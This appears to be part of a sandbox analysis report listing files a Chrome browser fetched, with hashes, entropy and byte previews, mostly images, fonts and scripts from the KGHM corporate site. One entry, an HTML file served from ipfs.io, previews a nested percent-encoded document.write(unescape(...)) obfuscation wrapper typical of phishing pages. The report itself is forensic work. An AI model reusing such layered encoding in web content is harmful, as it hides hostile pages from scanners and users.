                                          Preview:(()=>{const t=document.querySelectorAll(".paragraph--type--featured-link-with-image"),r=e=>{t.forEach(a=>a.classList.remove("active")),e.classList.add("active"),document.getElementById("featured-img").setAttribute("src",e.dataset.uri),document.getElementById("featured-img").setAttribute("alt",e.dataset.alt)};r(t[0]),t.forEach(e=>{e.addEventListener("mouseenter",a=>{r(a.target)})})})();.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 13 x 13, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):1447
                                          Entropy (8bit):5.824338298709625
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:AED0E86D23C4F4A4C6B5163D7A695832
                                          SHA1:4FBBE6F5D14D4BB29A733320DD1C595AA169F08E
                                          SHA-256:9A360EA4DC9B96F9193CDC69F3696E64894CDBFD35274CCED1B797459170FD70
                                          SHA-512:50EBC410020497019CC833698CD699393D83720F606E2FE2A4F11FE9D26E26F713C48DF8DBF05F2924A950F04750E765195B24B90DD9FE518DBA89D696DFEF91
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/custom/kghm/images/tool-icon--fsize-big.png
                                          Preview:.PNG........IHDR.............r..|....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 22.5 (Macintosh)" xmp:CreateDate="2022-05-05T13:20:54+02:00" xmp:ModifyDate="2022-05-05T13:51:09+02:00" xmp:MetadataDate="2022-05-05T13:51:09+02:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:5723886a-5489-4b5d-ba59-8696e6256a95" xmpMM:DocumentID="xmp.did:5723886a-5489-4b5d-ba59-8696e6256a95" xmpMM:Origi
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Web Open Font Format (Version 2), TrueType, length 78268, version 331.-31196
                                          Category:downloaded
                                          Size (bytes):78268
                                          Entropy (8bit):7.996968270435637
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:D824DF7EB2E268626A2DD9A6A741AC4E
                                          SHA1:0CCB2C814A7E4CA12C4778821633809CB0361EAA
                                          SHA-256:9834B82AD26E2A37583D22676A12DD2EB0FE7C80356A2114D0DB1AA8B3899537
                                          SHA-512:A84E13F216EA95146AF285AF98AEF0B464CD962440E161A1C602CA2178A179E04AE4ED2A2F98D5B2EB165480EC6920E0E88DE77D5F1EB7F11ED772B092DAF865
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-solid-900.woff2
                                          Preview:wOF2......1...........1b.K.$....................?FFTM....`..N.....h..B.6.$..0..4.. ..+...[.u..0..@p...J....P0.M.7.~3H..j......9........e.B....{....A1C.......tC`..T.}....P..hz.S.cBf...P. .<.."<.i..B......+...........B..0.gx..c)..hU.T.um+..4...:.`...!.3Cf..L.f.6..11.....W..0.."..]..4........B.o.x...3...-.z.$.>...eRw9..2-.8t.0....tE.O9.9........'%.R...d...~K).k....F.x#.....5.q..L...t..O.B..}..Y..p..N1:...vql... O.....>ouO...[..p.`.s.k.....Xo.m.....k...%.Z.G..H.<],.J..&.WL}.7.).....4..dh.......C...i.....y..X[{...HV.`V.B.JxQ........^......Vu./...*.2..8...gl9*.............4.GB..s.4.H..B.4..Xh?y..<..b.9..|...F.....&.?o~.U..*..v.:.......u..L;..........K..y0.0..:.?b..?.S..P..........my.y........X. .YK.z=%.ItG..8.E7.....{.'C.....gL0#DRH.~..."{. ..FAw.EE..p...5...[bC-....}6............G.7.~..Q_....._w..._w.f....L...T.1...s!..c3.:\.+.{C.......)Y.D........&Y.k7.}....w;..M..a.. @......v.....?a.8j..P...+8.l+......Wj.......G.._.0....".^...v.=`..p@&:.....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (360)
                                          Category:downloaded
                                          Size (bytes):361
                                          Entropy (8bit):4.86595079797936
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E6EDD39C71D71DE60F0F452A6671852E
                                          SHA1:4095058C2578D043A8137A39C32F5B476DA52403
                                          SHA-256:2FE0976149E91BD6CE2DD5356DC3AA0C0F37B74B7735F55A476C9EA8D4D67EC8
                                          SHA-512:F7A3F6B9F8D9A7654976D07E99BC7116AEF09F900070A8291355B570B899F328385EDF083505227A0CA4FB66907F978CE965305B770040A449727AECC6B8F6AE
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/custom/kghm/dist/assets/js/mega-menu-GViMGd2u.js?sm23fd
                                          Preview:(()=>{const a=document.querySelectorAll(".tb-megamenu-nav > .level-1"),s=document.querySelector(".content-overlay"),t=(e,o)=>e.className&&e.className.indexOf(o)>-1;a.forEach(e=>{t(e,"dropdown")&&s&&(e.addEventListener("mouseover",()=>{e.classList.add("open"),s.classList.add("active")}),e.addEventListener("mouseout",()=>{s.classList.remove("active")}))})})();.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Web Open Font Format (Version 2), TrueType, length 44856, version 1.0
                                          Category:downloaded
                                          Size (bytes):44856
                                          Entropy (8bit):7.9953752687590125
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:565CE506190AD3AF920B40BAF1794CEC
                                          SHA1:AD3CBA5D06100E09449A864D3B5E58403B478B3D
                                          SHA-256:8778E9AF2422858D7052FF9A0F3C12C08AE976BDD6E0316DB144CD5579CD97DB
                                          SHA-512:D18B76A6A173679E0E4F38F75229523FDD3601DFCF632BEC2501F7004F842CD5DC4AE899DCD50CD0BFB2F298720732162F5EBCC21D41A8694C1DF775A6EBB0F5
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/custom/kghm/dist/assets/OpenSans-Regular-jOzoGcLV.woff2
                                          Preview:wOF2.......8......&@.............................b. ..P?HVAR.x.`?STAT.$'....+...|.../V........z....0....6.$..8. ..~. ...[..q@..+.h.na..9pk-.D......OK&.a..8....D..g%..3.|.2....!....hK.dz.0..aj..V...i....}..$...gl..0.2j..!.....:.X.P.=e5.....E....De."./....B.E%x...iL7T.3q_.q.`...w4....=...H.....d>...]_.....4.Ia.".`...=j.d..i.....wD...*.n....x........q2.j\*I...........^H.......[S.A.....C\:1H....:.#.....T....}.,.E.....+(.P...T*.(.I#QDt&".9....s..t..........fd..).s:.....("....(*i$..bbc.6].X5ui.\...xo....Ov?.x.S.$Q.x...$..(...pK..<@BB...BBP?.3..]..v.......u...J.......X'.!3tJ.J..B....f.....!.....w.q...9| 6 ..y7./#.5..E.`A......m.......o...q..!...}1s.ob..M.]i.O..@.".H.....d..$.....nw/B..>..=}.....C.L&`...&...V,.C...R.:...).....%..m......C.T..R.....S.....8v.n.......F.G.Z6P..9w..T.U.)......m.j>..P..t^.......#...%.W!..k....P...JkZ....NH.H..n...`...w...j.x...c.;.... .........?^.x'0.._.....v.D1BR.I.X.f7{..v...\...3.*.".CM...Pkj}qmit..9..<.1&H....B.!G.P3..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1657x932, Suserng: [none]x[none], YUV color, decoders should clamp
                                          Category:downloaded
                                          Size (bytes):416970
                                          Entropy (8bit):7.999472620779897
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:06831DD3FF533FA80FD956FCD47F9FE1
                                          SHA1:A3D06A03E47F8FB6E8D95EEA209A4AF666B93F05
                                          SHA-256:E7D886B56E5A133C50C3F01BFDC2E711EBD179695D7B445AF1C48BEDF0DEFEAA
                                          SHA-512:7B2795831E81555D66BF6395FF78EEA6D4BD38279A8BACF49DECD559A26CA5501828B33D859F1752A96E58929DF3F4ED90C28A5FF82B8CF9842DAFCC7D090786
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/sites/default/files/styles/original_image/public/2024-02/W%20g%C3%B3ry%20z%20KGHM%20-%20album.jpg.webp?itok=8en-QaNs
                                          Preview:RIFF.\..WEBPVP8 .\..04...*y...>i(.E.".+.=K.p..en..9....M.P./.h...0..g...^/.....g..q.....<........O....Q...c|..%...o._.}....3.o{o........<.|.........._.?......m...O.>..../.?...{.............O.....?....;.....?..n.A.2...3.G.W.'...._....m.Q...G..p.s...o...o._.>$............C...O....`?............O._..........3......[.............?q.....b....._......O.?......o._......a....................#..._.....?..............>D7.....t\>.t{..t.:...8.yGE.. .w.{....!..l..O.WG...JI>.T@.G...6o.=...1F.%...5N....6p...au&....(.v.n.v..XFU..X....0v...H!.W(..@..n.0`r*N..M.,.eX<;Is^fE...t...j....AG:F..5.jUn.8<x<..G#ol\X...1..*..."!..e.=<`..i...,^.....z.......q.z..{.A.....iS9o.....^_..4.z%.i^.....B......#g..V}(......JW?X......hM...he..>.O..."..Q.|c.J..B.F7}.).......8.r....}+o..6...>x)g{q{....t...D..t.[B.3b.8...u..&......9Sj...6..u.8.?.;9[.W\..t.....f.m.&...E.U....K..;.0.....M.m.R}.I.{.....z.B..$.w.1F.]...q(Rs...&./tQ~...k..n.7R...N.9..t...-..a\..3.`.M...0.&h.U.N.x..... .x....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (587)
                                          Category:downloaded
                                          Size (bytes):261567
                                          Entropy (8bit):4.733868720685839
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6AD23F1AA42C2253F0A196EBEF3FF47B
                                          SHA1:A12B6C6A6FDAC1C8A69244F78F705BD3F5D7BC9C
                                          SHA-256:E102D0D931F189F91930ACEBCCC202B998E7D241CDD45FB2A2E09DB460494E2B
                                          SHA-512:FD011DA488B13D253A43CDF4BF193B91B0748A036D08B7610C1DFB4C4D9EE6BEE9EAEE0851E3685AB4C54E34AB9AB09E194C1648A15675A26B0894E672762DFA
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/pl
                                          Preview:<!DOCTYPE html>.<html lang="pl" dir="ltr" prefix="og: https://ogp.me/ns#">. <head>. <meta charset="utf-8" />.<meta name="description" content="Oficjalna strona Grupy Kapita.owej KGHM. Czo.owy producent miedzi i srebra rafinowanego, .wiatowy lider w bran.y g.rniczo-hutniczej." />.<link rel="shortlink" href="https://kghm.com/pl" />.<link rel="canonical" href="https://kghm.com/pl" />.<meta property="og:site_name" content="KGHM Polska Mied. S.A. Strona korporacyjna" />.<meta property="og:type" content="article" />.<meta property="og:url" content="https://kghm.comHome page" />.<meta property="og:title" content="https://kghm.com/pl/home-page" />.<meta name="Generator" content="Drupal 10 (https://www.drupal.org)" />.<meta name="MobileOptimized" content="width" />.<meta name="HandheldFriendly" content="true" />.<meta name="viewport" content="width=device-width, initial-scale=1.0" />.<style>div#sliding-popup, div#sliding-popup .eu-cookie-withdraw-banner, .eu-cookie-withdraw-tab {backg
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:RIFF (little-endian) data, Web/P image
                                          Category:downloaded
                                          Size (bytes):49154
                                          Entropy (8bit):7.996246565710245
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:65DA8B1A6CFCC9EB4D846694DE65B2C1
                                          SHA1:0B65A58B9D9370AC2D93BA2BF2F6CC9C9078BFF1
                                          SHA-256:AFA53FD975F9C01320728B29EB9006C438085599D1446CDDD7540A5BC10EDB08
                                          SHA-512:D21677186B4A3FCF12C71F418D43446D71BA7F14B83FC1F6A6BFF15967CA909F34A7F882962644D6BC5EDD19C22116F629BC60A514F0B097863E88071A066D78
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/sites/default/files/styles/original_image/public/2022-11/warstwa_58_0.png.webp?itok=HHWDiin9
                                          Preview:RIFF....WEBPVP8X...........U..ALPH...... $ ..4C.FD....m$......&...;r.F.......K>.kn.}..../......M.?.4z..O...$.S@.7.....M.?...$ ....l..">..9.......'.# ....l..">..9.......'.# ....l..">..9...B.=..?.##?d..NVP8 (...pl...*..V.>m0.F.#-..S,1...M.c.....B9...n..#.&.....6.N..~. ....w....3..\.?.......|.........D."....y.2.(.......{K...?..........{..._.p....>..P.*.OU.{..z......}...m.a.C~.........u..8.Qo.)<.+.....U/|6\."...K....o(..9..,...Hg..O<Y...Sw.<.fd....R.....e=......H..(.......B.#..n.|.......^.&&.2...n.,.B.4..F.o.i..K{..X....0...>.....P....6^@.i.-..Gn.P..>.E0.s.GP....(l..3.^b..Rlm!.b.^.........9.\..\R..f... E...e...:...@..H...e..Ui0..R..,.**..d\&.^me...E..O.k....D?q...VYFK.4<..CH.....,>.@..I.:....N....>O.q....../.#N.W...vb..R........$W5RV.T5..!....{<8f#.......).K..{N..._l.".By...ci?..v.N&..oR%...a.D.V.r....y.......KHq.|p.|..C...M.sN.WZ.|.c:yqY.....At/...#.:d-9..2x\..?......... ............;i.W....#...n).'.K_....:..C.)..C.@....VV.&R...,K..~.;..H.....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Web Open Font Format (Version 2), TrueType, length 31320, version 1.0
                                          Category:downloaded
                                          Size (bytes):31320
                                          Entropy (8bit):7.993953148843315
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:3FE71527811FBFEDD2C07962E1BC49E7
                                          SHA1:F63E158A0480C5D711B5E268DB0E75E57D87A8A5
                                          SHA-256:24C0E724005344165EE0A0FF4C96A914E174BB4CAA20C8A533FB194D92853E95
                                          SHA-512:1CAB1F4975B689610770C78B733B60C6FA8BE872CA1D778AD2034511F787083C8E098DA7B06C5025532FA9DE6B173DEF2A05195DF927D356939A7812BF02B4B7
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/custom/kghm/dist/assets/OpenSans-latin-ext-6MU6OpyK.woff2
                                          Preview:wOF2......zX..........y............................. ..&?HVAR.J.`?STAT.$'....+...|.../V.....P.c....0..\.6.$.... ..~. ....Z.5lS.......U...T.mF.n....D.d.3...H......d.B.!Z....R.2.h.......01.y..g.#k.j.."..B.kW..<...=.........+..nd.2x.j..!.$..b....AG../....0......i!.k..*........Ej..~q.E...M.......V........pA.I.....u.U`....DE.?~S.?.f.......p.%._"i....$...1.p.4..,ix~n..k.....J6B.i.9.Jhcp7....#.H#1...HR.....m...aa].....WY^.....E.E.. . ((.Vc,h..n.....SvK.DD..[...u"..va..&%A.!dBD...Z(.}v.w..t..E.g#[oV..."brj..)K.aab...X(.(.R.b4.9...6..2....ve..E.w...]I.O.j.$.... L..o...OlD,.v...\ fD.Q!JB...Dl.e.Rq..~...c.......e,.#I..Q...xj.N.........Q.2...........roE+s......Q3.;.W...=.3.p.-.?@t.da.6.....+...!.m..........]d..X...!.9.W....x...He .S.j........J....e..i.T/a.FS.....f..2..<..z....E&..;K....)v..RW.d.O.b.8...f.L~......e..N.......j..V.,...r.9.'..[...a..vXy;...%..tw.s.e.iia. .._um.6\H......u.c..*l...+.......| .Nx.....@........./..p....'..C.R(*.S.X.>.....{.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1917x1079, Suserng: [none]x[none], YUV color, decoders should clamp
                                          Category:downloaded
                                          Size (bytes):279020
                                          Entropy (8bit):7.9992941218939215
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:3C45074F9658BACC6C738C954725CD47
                                          SHA1:44D532354740D0DB5EA1A661148200538E5656C4
                                          SHA-256:B54EACAADD20E1E5ADCBF75F8E092CF10EEF572C2CBA891EF5D99574B63C1086
                                          SHA-512:F5AA17AE2CE1C10DAAB797E2A45047F2B915AE84E8E3C969B16F2A7FEB0F61C827AE7A8265C2C1E2A13B780F3E24800882E3A1C8B7728998182810B587F248CE
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/sites/default/files/styles/original_image/public/2024-04/Granulat%20srebra.JPG.webp?itok=CJwhoJvI
                                          Preview:RIFF.A..WEBPVP8 .A.......*}.7.>m4.H$".!$.z....ea.F.?......_.yS..>.......O%...>......;.......}....sE?........,*1...&"M..{....o].o...x|..7.6..N.....O....J.........................?........W..............................._2...g..z.|....=......-._....O..K..?.z..:.......o_.........-.}.S........?..s...o.....;.....{...../..'.X......._.=...........=...s...^.......{.......=....G......?.....|...zH~....W-.......n5.o...Y....B.V.e......t........c...u.T.g.L.....#;..y...+.m_<.NX*....-..^gz....p......F'...m.R".....\...R,.I.8.........rI...@.....wE.U..{r.)...M..)..........H..7.w...{.0...E.....z.....\.....&.-n..y....c.Z*.. j.....P..m...W..........d...'N. .\....*......)........XsK../1...j,....W...(..c... .%k..(...(....T.x.S`E....C.\.......;..`.HS..\. .r,.....h..l.i..9.a,.K)I'..8.T..<...{.b?...\.... ...#.)...Y..Dz[..k|..7.u.?m6....i.........!....=....5e.[TV1..U.....no.0?...W .1.Sd...$.$.\...<x....t.../M!.hS..t...`....o..0..{c....f/...$..A....rJ.f..|.9..>?..6. .}4
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:RIFF (little-endian) data, Web/P image
                                          Category:downloaded
                                          Size (bytes):258
                                          Entropy (8bit):6.760689520353645
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:103BD01AA70EB0A797021304134732C5
                                          SHA1:A5A868FAA5CBF8157F93CA750ADAE2F209328E06
                                          SHA-256:436FF67DF718B5E601A827C3B057E8D5DA1333264A92952B96F86B38D7FEB402
                                          SHA-512:16BE8C2E551E0D2DF90986CA68335CAAFE18F1BD20A2F617D3AB95D838888BD644940CE3F3608F4E1DE67D1AABE4735B06DDA70F51912F7726C3CA6E3B6E75E3
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/sites/default/files/styles/large/public/2022-07/social-icon--youtube.png.webp?itok=h6N7rzpB
                                          Preview:RIFF....WEBPVP8X..............ALPH_....p.I.".=G...Y....p$.....#~.... .J.vZ...\...lE(...).H...C...=!./...<7..Cj.I..+......vX..|_...H..VP8 t........*....>m,.E."....@...N.@...%.."O..<~...[.k....6&..67.......[..'..o...w....)2....%.....W..re.4.Bne.. Kk......
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Web Open Font Format (Version 2), TrueType, length 76736, version 331.-31196
                                          Category:downloaded
                                          Size (bytes):76736
                                          Entropy (8bit):7.997372822381554
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:ED311C7A0ADE9A75BB3EBF5A7670F31D
                                          SHA1:0613C7EBBA55EE47EF302C0F7766324692F899A7
                                          SHA-256:8EA8791754915A898A3100E63E32978A6D1763BE6DF8E73A39D3A90D691CDEEF
                                          SHA-512:6048E7AB94134B7200F0D5ED7FB8D577298D4831A2B3A4E0E5BAA5C67468F77D4409314D63D34436BA6BA038C86FAF87E46DACF98D311A74291B976FA39A9674
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
                                          Preview:wOF2......+........`..+f.K.$....................?FFTM....`..z.....<..".6.$..,..... .....][.q..".z$.n"...ZUcb...F.n...g1^p\.8..[=.....$..!..G|..B.UUk.:..8..R..Uz...a.....m......D.ax...r.v.,....l...GyrH.Ap...R..z.s..^.H.|XIx.7..U".e...tXL[.nO..k.,o..."...6...U.}x...M.~.W...h.@..d........u....Y`.Mw.z.'#(....!.....s..%..O. Ep.... [.@..ra.95...C.....9.!...I.G.C.....#..g.....8o.&?.x8.nN.].e..'4..7...I..{.>.?..6e..ht.g.C}..}..)../^..>:,Yh..Ba$.R.....=....].PBQ..Y.hA..&.X......5$.......R&.*jb.......B.....V......E.ER.F..RVD..h..P.l..T....81..3..;...........d4........H\R..lx~n..fcc..zE........i .( .......z.WV].w^..W....f.L..K6@.@h.uE........3.R....VI<......c.kBL.B'.C;.0...3.........B.|P..7{...J4.......%$.,N.`.....UP..;i|.'A......X>.s];e_(.p.D.}.....y~9........d.rF..L.R..... ....`RC.v.....T.._...h..S........@.{H..N....TR...f}\:\..U...RC@R..fbh2...a..r.O.{..+..?.Sa.6p.............fH7.t......./q.g...p..OW.......t. .,p.....42....h@...k...o......_.....o:.a...FlXP..P>..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:downloaded
                                          Size (bytes):16
                                          Entropy (8bit):3.875
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:7BD9BEAA94BE522553F1F62F70A02611
                                          SHA1:89DE921CAF46FBB941C324516F46DD3DDE1AABD1
                                          SHA-256:6147EEEEE2F4940916E64A41927B9B94845A30F96A3681A9BD09C80767955FBA
                                          SHA-512:DF8DBB1712753699451D8F47D2EC74B1487F85B51C43036D59EA6750EE2AAC3A7E2311EE7FEFEF8C53C5FA55247CC689E723DC201FDF126EB2E4FE96841933D3
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkguc_ypH2EhhIFDea_hsc=?alt=proto
                                          Preview:CgkKBw3mv4bHGgA=
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):9189136
                                          Entropy (8bit):2.1134015418705316
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3AD9C1D48D2744E318510AF05167EEA2
                                          SHA1:AD0FBC5B01B9ED2565DC3C9469EA2E1D54743315
                                          SHA-256:399567D721E1E027519B4EF4E9FFE96FF730E98CE4BA4AAB8F7386BE3C83CD9A
                                          SHA-512:6F01802C8C68993F65E7B14158BB5BC5BD5B6EF65EFC1A472D5631D45203F39A66F91483E8F1A5F5240F68DD330743FE2D231C2141AEBF97B96D7DCEC8EDE5E6
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8
                                          Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%20code%20by%20https%3A//www.html-code-generator.com%20--%3E%0Adocument.write%28unescape%28%27%253C%2573%2563%2572%2569%2570%2574%253E%250A%253C%2521%252D%252D%2520%2563%256F%2564%2565%2520%2562%2579%2520%2568%2574%2574%2570%2573%253A%252F%252F%2577%2577%2577%252E%2568%2574%256D%256C%252D%2563%256F%2564%2565%252D%2567%2565%256E%2565%2572%2561%2574%256F%2572%252E%2563%256F%256D%2520%252D%252D%253E%250A%2564%256F%2563%2575%256D%2565%256E%2574%252E%2577%2572%2569%2574%2565%2528%2575%256E%2565%2573%2563%2561%2570%2565%2528%2527%2525%2533%2543%2525%2537%2533%2525%2536%2533%2525%2537%2532%2525%2536%2539%2525%2537%2530%2525%2537%2534%2525%2533%2545%2525%2530%2541%2525%2533%2543%2525%2532%2531%2525%2532%2544%2525%2532%2544%2525%2532%2530%2525%2536%2533%2525%2536%2546%2525%2536%2534%2525%2536%2535%2525%2532%2530%2525%2536%2532%2525%2537%2539%2525%2532%2530%2525%2536%2538%2525%2537%2534%2525%2537%2534%2525%2537%2530%2525%2537%2533%2
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:RIFF (little-endian) data, Web/P image
                                          Category:dropped
                                          Size (bytes):230
                                          Entropy (8bit):6.481362610294023
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D1111B320F892207B01D90BEB9402471
                                          SHA1:203F7438D89CE3742A6FB9C6B90420EAF0F774E3
                                          SHA-256:D4C72A81B56E9C9F33BBC689056D3C255F023134E63ABC27A64D0BB62EADD6BA
                                          SHA-512:D620FF3B860E2D0E0673D733CF7AD0E4B2828764FEED810A32105FA0F2474B1B8F132F76A5B415ABDA790344CBCB1906A38919A0E386AF19220968C67B1051D5
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:RIFF....WEBPVP8X..............ALPHP....pSm.........-.....V.0{.grg"@DL.@......>......Skz...M.T`..c.@...{.g.....%.J.aVP8 h...P....*....>m..F$"..0.....f....~.9.Q.{..kK.x......t........../.?I...........w.....i...6w\......+ J..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 26 names, Macintosh, Copyright 2011 The Montserrat Project Authors (https://github.com/JulietaUla/Montserrat)Montserr
                                          Category:downloaded
                                          Size (bytes):261588
                                          Entropy (8bit):6.175102663024726
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:88932DADC42E1BBA93B21A76DE60EF7A
                                          SHA1:3320FF5514B32565B0396DE4F2064CE17EC9EEA4
                                          SHA-256:C4C8CB572A5A2C43D78B3701F4B2349684E6CA4D1557E469AF6065B1E099C26C
                                          SHA-512:298E1E171DBBE386E1ABE153446B883C40910819099F64F54DC9FAA95D739BE56839537342BBE8DD8408545CB1F8C98878A3524D91AF1F11A112D1BFC202657A
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/custom/kghm/dist/assets/Montserrat-Bold-MMV-9BHe.ttf
                                          Preview:........... DSIG............GDEF.6.b...,....GPOS..U.......4.GSUBx0m...8...=<OS/2V.F..u....`cmap......v0...(cvt 3..=.......fpgmM$.|......mgasp...........glyf3He....X...head.i....c....6hhea...u..c@...$hmtx~._...cd...\loca../X.......0maxp...M....... name.g.........9post.B....L..WJprep.K.....................V...a...H...J.....................................................0.:...<.U...W.Y...[...............................B...D.K...N.s...u...................-.../.@...B.g...i.................................................7...9.;...=.p...s.s...u.w...z............................................................................................................................................................./...1.2...4.5...7.7...9.:...<.B...H.H...J.J...L.N...P.T...W.[...]._...a.d...f.f...h.h...j.r...t........................................................................._...{...........................!.$...&.'...,.F...J.K...M.]...{.|...............&....DFLT..cyrl.$latn.j..............
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:RIFF (little-endian) data, Web/P image
                                          Category:dropped
                                          Size (bytes):282
                                          Entropy (8bit):6.8592900658226945
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:86C2900F1278AFE61958B6407F44D792
                                          SHA1:AE00627F33117755048AEBA611414A4774E4AF44
                                          SHA-256:36402A7C7E2ACB48BF548EFAB3D734BADF25F590FE6384B98AB69B32F67A0F22
                                          SHA-512:601FC6D9F931802FD6FD2090AA9C92728A53CEA501AAA869A09FB3014ADE21A36029020D867F55A95C2A48205AAC76A2B1A4008751A2EB54EF60AF5F9DDAEEFF
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:RIFF....WEBPVP8X..............ALPH......#[..).**.r*...a......w.E&U...e....v..W.....N8m.v.......M....6J-...u...sr......n..!p..@...i.Z......0.{..2..GF.v.G...1..KR..(.GJ..NIy..VP8 Z........*....>m2.G.".!(.....@.`.......o....]U:......7[..z.'......sa...".l...4pG.y.......
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):262144
                                          Entropy (8bit):5.0680832744504665
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:99B5CA328BC62C126E488EAE5ADCEDAA
                                          SHA1:ED2280BAF513554FCE31E2A4D305B6BF485CA0C3
                                          SHA-256:1046176942A9B85F19713C34BE96E7D1515A8A1A4C48A5164C6FD8AF279D0DD7
                                          SHA-512:FFD8F315C723E7ED519C9F5D696D0662987CBEB5AA265F2234B40D70FE7175B5EBCFE84F6F99BB938BFCF71EF69AACB471153BD7F26D0DE5B5F1F37B1241E425
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:/*!. * jQuery JavaScript Library v3.3.1. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2018-01-20T17:24Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (1006)
                                          Category:dropped
                                          Size (bytes):1007
                                          Entropy (8bit):4.787239014957529
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:286F316FEC2DEF4A2FBB5B0F011878F4
                                          SHA1:9724FEC47C7A4FED9C9AE4174236A2E5AD82F3E0
                                          SHA-256:AC26336895FA04CDC70D4A3B7D7FB434A846D6BA2B89B920F50610942E9E83F9
                                          SHA-512:B3FE9344ADE2EC1235E74A547DDF420563CD78558C938C8C92E3C7688D4BCF9264771CE5A3733E19F14E36FFCF1A2D8CC61D2506B398723D1434BE07BDE629A7
                                          Malicious:false
                                          Reputation:unknown
